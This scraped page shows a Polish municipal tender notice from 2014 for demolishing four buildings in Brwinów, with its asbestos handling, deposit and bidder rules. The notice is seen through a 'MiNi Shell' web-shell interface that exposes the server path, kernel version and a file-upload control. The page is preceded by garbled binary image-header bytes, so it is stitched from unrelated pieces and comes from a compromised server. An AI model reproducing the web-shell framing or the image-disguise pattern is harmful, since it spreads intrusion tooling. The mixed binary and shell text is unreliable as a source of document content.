JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/60495-N-2014.html

<p class="kh_header"><b>Brwinów: Rozbiórka czterech budynków biurowo-magazynowo- produkcyjnych oraz instalacji wodno-kanalizacyjnych i elektrycznych położonych przy ul. Grodziskiej 18 w Brwinowie dz. nr ew. 53/1, 53/4 obręb 12.</b><br>
<b>Numer ogłoszenia: 60495 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbiórka czterech budynków biurowo-magazynowo- produkcyjnych oraz instalacji wodno-kanalizacyjnych i elektrycznych położonych przy ul. Grodziskiej 18 w Brwinowie dz. nr ew. 53/1, 53/4 obręb 12..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest rozbiórka czterech budynków biurowo- magazynowo- produkcyjnych oraz instalacji wodno-kanalizacyjnych i elektrycznych położonych przy ul. Grodziskiej 18 w Brwinowie dz. nr ew. 53/1, 53/4 obręb 12. Oznaczenie budynków do rozbiórki przedstawia załącznik graficzny  (budynki: A, B, C, D) i dokumentacja fotograficzna. Powierzchnia działek, na których zlokalizowane są budynki wynosi odpowiednio: dz. nr ew. 53/4 - 0,2099ha,  dz. nr ew. 53/1 - 0,2690ha, razem = 0,4789ha. Łączna powierzchnia zabudowy budynków wynosi 972,12m2.

2. Opis stanu technicznego budynków, instalacji wod.-kan, elektrycznej i terenu.    
2.1. Budynek A (istniejące ściany fundamentowe pozostałe po pożarze).
Zlokalizowany jest na dwóch działkach: nr ew. 53/4 i 53/1: część budynku A znajduje się na działce nr ew. 53/4 - 44%, a część budynku A na działce nr ew. 53/1 - 56%.
Wymiary fundamentów budynku: 5,20m x 29,20m, grubość 25cm (na poziomie terenu) i 50cm (poniżej terenu), z bloczków betonowych do rozbiórki. Budynek podpiwniczony na całej długości i głębokości do ok. 2,0m.
Do wywozu dodatkowy gruz ceglany zalegający na poziomie stropu piwnicy ok.7,0 m3 oraz pozostałości innych bliżej niezidentyfikowanych materiałów po pożarze.    
2 przyłącza wodociągowe od strony hydroforni do budynku - ok. O 32-40mm prawdopodobnie z rur stalowych ocynkowanych nieczynne - przebieg orientacyjny wg. map - do demontażu w trasie przebiegu poza drogą z trylinki i w obrębie budynku. Podczas demontażu należy zabezpieczyć końcówkę rur w stronę hydroforni przed dostawaniem się nieczystości w jej stronę. Wzdłuż budynku droga betonowa z trylinki nie podlega rozbiórce. Do usunięcia także uschnięty drzewostan wzdłuż budynku (nadpalony podczas pożaru).
Wzdłuż fundamentów budynku przebiega kabel energetyczny ze stacji transformatorowej 0631 do budynków na działce nr ew. 53/5. 

2.2.  Budynek B.
Zlokalizowany w całości na działce nr ew. 53/4 w ostrej granicy z działką nr ew. 53/6.
Wymiary budynku 22,20m x 11,00m, wysokość ok. 4,5m.
Ściany zewnętrzne drewniane obłożone supremą, otynkowane, o grubości ściany ok. 25cm.
Wewnętrzna ściana nośna ceglana grubości 0,50m. Ściany wewnętrzne drewniane obite płytą pilśniową obustronnie, częściowo otynkowane. Posadzki betonowe do rozbiórki. Dach czterospadowy kryty papą ok. 300,00m2.
Nieznany jest materiał i stan fundamentów. Należy założyć posadowienie do głębokości ok. 1,2m, gdyż brak jest piwnic. Ściany fundamentowe do rozbiórki.
W budynku znajdują się nieczystości: śmieci, połamane meble, odpady szkła, papiery różne, wykładziny podłogowe - w ilości ok. 7 m3.  Instalacja elektryczna wewnętrzna natynkowa na uchwytach. Wewnętrzna instalacja c.o. wraz z grzejnikami (częściowo zdemontowane).
Żeliwna rozdzielnica energetyczna wewnętrzna (częściowo zdewastowana).
Przyłącze ciepłownicze od strony budynku na działce nr ew. 53/5.
Sieć energetyczna zasilająca w ziemi od strony budynku na dz. nr ew. 53/5. Na dachu instalacja odgromowa, na uchwytach odstępowych. Od strony północnej kabel energetyczny w ziemi ze stacji transformatorowej 0631 do budynku na działce nr ew. 53/5.
Od strony ul. Grodziskiej częściowo zdemontowane przyłącze napowietrzne. Na dachu pozostał łącznik z linią napowietrzną nie izolowaną z budynkiem na działce nr ew. 53/5.
Wzdłuż południowej linii budynku przebiega w ziemi rura wodociągowa O ok. 40mm prawdopodobnie stalowa ocynkowana z hydroforni na działce nr ew. 53/1 do budynku na działce nr ew. 53/5, połączona ze zbiornikiem wody p. poż. Rury należy usunąć poza pasem drogi z trylinki i w obrębie budynku, końcówkę od strony hydroforni zabezpieczyć. Przy budynku B znajduje się hydrant do rozbiórki.
Wzdłuż budynku (wschodnia ściana) na działce nr ew. 53/6 przebiega czynny kabel energetyczny ziemny w odległości 1,5m od ściany budynku zasilający stację bazową P4 (PLAY) 100% na działce nr ew. 53/4, który nie podlega demontażowi. W sąsiedztwie budynku droga z betonowej trylinki nie podlega rozbiórce.            

2.3. Budynek C.
Zlokalizowany na działkach: nr ew. 53/4 i nr ew. 53/1. Ok. 50% budynku C znajduje się na działce nr ew. 53/4 i ok. 50% budynku C znajduje się na działce nr ew. 53/1. 
Wymiary budynku: 16,60m x 10,80m,  wysokość 4,0m (średnia); ściany zewnętrzne: drewniane, o grubości 15cm, budynek ocieplony supremą, otynkowany. Dach jednospadowy kryty papą pow. ok. 200,00m2. 
Ściany wewnętrzne działowe drewniane, ocieplane supremą i otynkowane. Strop w 50% zapadnięty, zawilgocony. Ściany fundamentowe i posadzki betonowe do rozbiórki. W budynku wewnątrz znajdują się: stare zniszczone meble, stolarka budowlana, beczki plastikowe 3 szt., hoboki 5 szt., gąsiory szklane 2 szt., itp. - ok. 5,00m3. Przy budynku znajduje się teren utwardzony płytkami chodnikowymi o wymiarach 16,60 m x 6,00, który jest przeznaczony do rozbiórki. Wewnątrz budynku występują słupy murowane otynkowane 3 szt., na których wspiera się dwuteownik stalowy podtrzymujący konstrukcję dachu. Budynek przy fundamentach obłożony azbestowym eternitem falistym do nieznanej głębokości, eternit do utylizacji. Nieznana głębokość i rodzaj materiału fundamentów. Należy założyć  posadowienie do głębokości ok. 1,2m, gdyż brak jest piwnic. Szczątkowa instalacja elektryczna. Przy budynku (w terenie utwardzonym płytkami chodnikowymi) znajduje się studnia z kręgów betonowych o nieznanym przeznaczeniu - do usunięcia. W rejonie budynku (poza pasem drogi) znajduje się także ujęcie czerpalne wody z przewodu O32-40mm, które wraz z przyłączem należy usunąć. 

2.4. Budynek D.
Zlokalizowany na działkach: nr ew. 53/4 i nr ew. 53/1. Wymiary budynku 12,80m x 31,00m, wysokość 5,60m w kalenicy, wysokość ścian do więźby dachowej ok. 3,60m (85% budynku D znajduje się na działce  nr ew. 53/4 i 15% budynku D znajduje się na działce nr ew. 53/1).
Ściany zewnętrzne z gazobetonu + tynk o grubości 28 cm z cegły wapiennej.
Drzwi metalowe 4 szt. wysokość ok. 2,70m x szerokość ok. 2,30m (drzwi pełne - wjazdowe dla pojazdów). Dach - konstrukcja kratownica stalowa, dwuspadowy o pow. ok. 440,00m2, kryty eternitem falistym, eternit do utylizacji. 
Ściany fundamentowe i posadzki betonowe o grubości ok. 15cm - do rozbiórki. Kanał ciepłowniczy w posadzce z rozprowadzeniem do suszarni, część suszarni metalowa - do demontażu, szyny kolejki wąskotorowej do rozbiórki.
Budynek posiada kabel energetyczny zasilający ze stacji 0631 do istniejącej rozdzielni wewnętrznej żeliwnej usytuowanej w środkowej części budynku, częściowo zdewastowanej i zdemontowanej. Instalacja elektryczna wewnętrzna szczątkowa. Instalacja na dachu odgromowa (naprężana). Istniejące przyłącze cieplne od strony działki nr ew. 53/5 wewnątrz budynku w kanale ciepłowniczym murowanym z cegły do suszarni w tym budynku. Ściana wewnętrzna murowana o wym. 12,80m x 0,25m i wysokości ok. 4,6m średnio.
W zachodniej części budynku znajdują się beczki z resztkami po olejach i smarach - 15 szt. W części wschodniej budynku znajdują się stare zaprawy tynkarskie cementowo-wapienne ok. 6,0m3 w workach. Wzdłuż budynku droga z betonowej trylinki, która nie podlega rozbiórce.    

2.5. Pomiędzy budynkami C i D na działce  53/1 i  na działce  53/4  znajduje się składowisko eternitu ok. 4,0m3, stłuczki szklane ok. 5,0m3, gruz budowlany ok. 5,0m3 oraz inne materiały w ilości ok. 3m3. 
Należy przewidzieć bezpieczne składowanie i wywóz materiałów niebezpiecznych i szkodliwych dla środowiska. Należy również wykonać plan bezpieczeństwa ze szczególnym uwzględnieniem rozbiórki budowli na wysokościach (np. rozbiórki konstrukcji dachowej budynku D) i wymagających wykopów (np. rozbiórka fundamentów budynku A przy ogrodzeniu od strony ul. Grodziskiej).  

2.6. Pomiędzy budynkami C i D na  działce 53/1, zlokalizowane są studnie głębinowe szt. 2. Należy zwrócić szczególną uwagę na te istniejące ujęcie wodne i zabezpieczyć je wraz z rejonem przyległym jako obszar chroniony (bariery, tablice, itp.), w rejonie którego zabrania się składowania materiałów olejowych, olejopochodnych, toksycznych i niebezpiecznych. 

2.7. UWAGA!!! Przed przystąpieniem do demontażu jakichkolwiek instalacji elektrycznych należy sprawdzić czy nie są one zasilane, z uwagi na brak dokumentacji elektrycznej obiektu. W przypadku obecności zasilania na terenie rozbieranych obiektów należy je w sposób trwały odłączyć, kable uziemić i dopiero przystąpić do demontażu z zachowaniem zasad BHP.
Przed rozpoczęciem demontażu kabli elektrycznych ziemnych należy sprawdzić ich odłączenie w stacji transformatorowej 0631 oraz w budynku na działce nr ew. 53/5.

2.8. Na działce nr ew. 53/4 wzdłuż północnej ściany budynku D oraz pomiędzy budynkami A i B znajduje się utwardzona droga dojazdowa o szerokości ok. 4,0 m z płyt betonowych. Powyższa droga nie podlega rozbiórce.
Wszystkie materiały z rozbiórki: podlegające utylizacji, niebezpieczne, toksyczne itp. stanowiące zagrożenie dla środowiska należy przekazać do utylizacji potwierdzając odpowiednim dokumentem.  

3. Zakres robót rozbiórkowych do wykonania:
3.1. pokryć dachowych z papy i eternitu,
3.2. drewnianych i stalowych konstrukcji więźby dachowej, 
3.3. drewnianych i betonowych stropów nad parterami budynków, 
3.4. ścian zewnętrznych i wewnętrznych drewnianych i murowanych (szczególną ostrożność należy zachować przy demontażu budynku B z uwagi na czynny kabel energetyczny wzdłuż wschodniej  ściany budynku, który nie podlega demontażowi),
3.5. posadzek betonowych,  
3.6. ław ścian fundamentowych, 
3.7. instalacji sanitarnej wraz z urządzeniami, 
3.8. stolarki okiennej i drzwiowej, 
3.9. instalacji wod.-kan. i elektrycznej wraz z urządzeniami oraz odgromowej wskazanych w punktach 2.1, 2.2, 2.3 i 2.4,
3.10.  kabli energetycznych ziemnych wskazanych powyżej z zachowaniem bezpiecznej pracy na urządzeniach elektroenergetycznych oraz bhp,
3.11. załadunek i wywóz materiałów z demontażu: gruzu, eternitu, odpadów z terenu rozbiórki i pozostałych, 
3.12. Zabezpieczenie terenu rozbiórek przez Wykonawcę przed dostępem osób nieuprawnionych w trakcie trwania terminu umownego, 
3.13. Sporządzenie inwentaryzacji geodezyjnej powykonawczej, po wykonanej rozbiórce budynków, na której powinny być naniesione zapisy geodety o pozostawionych w ziemi urządzeniach nieczynnych.
4. Obiekty należy całkowicie rozebrać ze ścianami fundamentowymi, a teren rozbiórki uporządkować, zniwelować, zasypać dowiezioną ziemią  urodzajną, grunt zagęścić i zasiać trawą.  
5. Demontaż, załadunek i transport eternitu powinien być wykonywany przez firmę posiadającą stosowne zezwolenia na wytwarzanie, transport  i unieszkodliwianie odpadów zawierających azbest. Eternit należy przekazać do utylizacji za potwierdzeniem odbioru i dostarczeniem karty przekazania odpadów na składowisko.
5.1.  Prace związane z usuwaniem wyrobów zawierających azbest należy wykonać zgodnie z przepisami prawa, w szczególności z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. Nr. 71 poz. 649 ze zm.)
Po wykonaniu prac związanych z usuwaniem wyrobów zawierających azbest, Wykonawca prac ma obowiązek złożenia pisemnego oświadczenia o prawidłowości wykonania prac oraz o oczyszczeniu terenu z pyłu azbestowego, z zachowaniem właściwych przepisów technicznych i sanitarnych.
Wykonawca ma obowiązek dostarczenia Zamawiającemu dokumentu potwierdzającego tj. karty przekazania odpadów na składowisko.
6. Zakłada się uzyskanie dofinansowania z WFOŚiGW  na utylizację eternitu.
7. Materiały metalowe z rozbiórek należy dostarczyć do punktu skupu złomu, a kwotę uzyskaną ze sprzedaży wpłacić do kasy w Urzędzie Gminy Brwinów.
8. Wywóz i utylizacja wszystkich materiałów po robotach rozbiórkowych należy do Wykonawcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 50% wartości zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju zamówień. Na zamówienia uzupełniające zostanie zawarta odrębna umowa na podstawie art.67 ust.1 pkt.6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona wadium w wysokości 3.000,- zł (słownie: trzy tysiące złotych),
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
4. Wadium wnoszone w formie pieniężnej należy wnieść przelewem na konto zamawiającego: Nr konta 54 1140 1010 0000 4770 4500 1018
5. Wadium wnoszone w pozostałych formach prosimy w formie oryginału załączyć do oferty.
1) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, nr zamówienia nadany przez Zamawiającego, nazwę zamówienia; 
b) określenie wierzytelności, która ma być zabezpieczona gwarancją; 
c) kwotę gwarancji;
d) termin ważności gwarancji (nie może być krótszy niż termin związania Wykonawcy złożoną przez 
niego ofertą); 
e) bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
- odmówił podpisania umowy na warunkach określonych w ofercie, lub 
- nie wniósł zabezpieczenia należytego wykonania umowy, lub 
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2) Jeżeli wadium wnoszone jest w formie poręczenia, poręczenie powinno być sporządzone zgodnie z obowiązującym prawem oraz winno zawierać następujące elementy: 
a) nazwę poręczyciela, nazwę wierzyciela (Zamawiający), nazwę dłużnika (Wykonawcy) na rzecz którego udzielane jest poręczenie oraz wskazanie ich siedzib, numer zamówienia nadany przez Zamawiającego, nazwę zamówienia; 
b) określenie wierzytelności, która ma być zabezpieczona poręczeniem; 
c) określenie wysokości wierzytelności objętej poręczeniem; 
d) termin ważności poręczenia (nie może być krótszy niż termin związania Wykonawcy złożoną przez niego ofertą); 
e) zobowiązanie poręczyciela do zapłacenia kwoty poręczenia na pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
- odmówił podpisana umowy na warunkach określonych w ofercie,  lub 
- nie wniósł zabezpieczenia należytego wykonania umowy, lub  
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy lub
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
6. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na rachunku bankowym Zamawiającego.
7. Wadium musi obejmować termin związania ofertą.
8. Wykonawca, który nie zabezpieczy oferty wadium zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego. 
9. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.13.
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
11. Zamawiający zwróci niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub 
2) nie wniósł zabezpieczenia należytego wykonania umowy, lub
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej 2 roboty budowlane polegające na wykonaniu rozbiórek obiektów budowlanych o łącznej wartości nie mniejszej niż 100.000,00 zł brutto, wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, 

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Uwaga: W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu NBP z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu opublikowania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.

4. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;   Za najważniejsze roboty uznaje się roboty niezbędne do wykazania spełniania warunku określonego w pkt 2.
a) Dowodami potwierdzającymi czy roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, są:
- poświadczenie lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. 
b) Jeżeli Zamawiający (Gmina Brwinów) jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie - załączniku nr 3, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c) W razie konieczności, szczególnie gdy wykaz robót lub dowody potwierdzające czy roboty zostały wykonane w sposób należyty, lub czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, budzą wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponuje lub będzie dysponował osobą kierownika rozbiórki posiadającego uprawnienia budowlane w specjalności uprawniającej do kierowania rozbiórką.

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

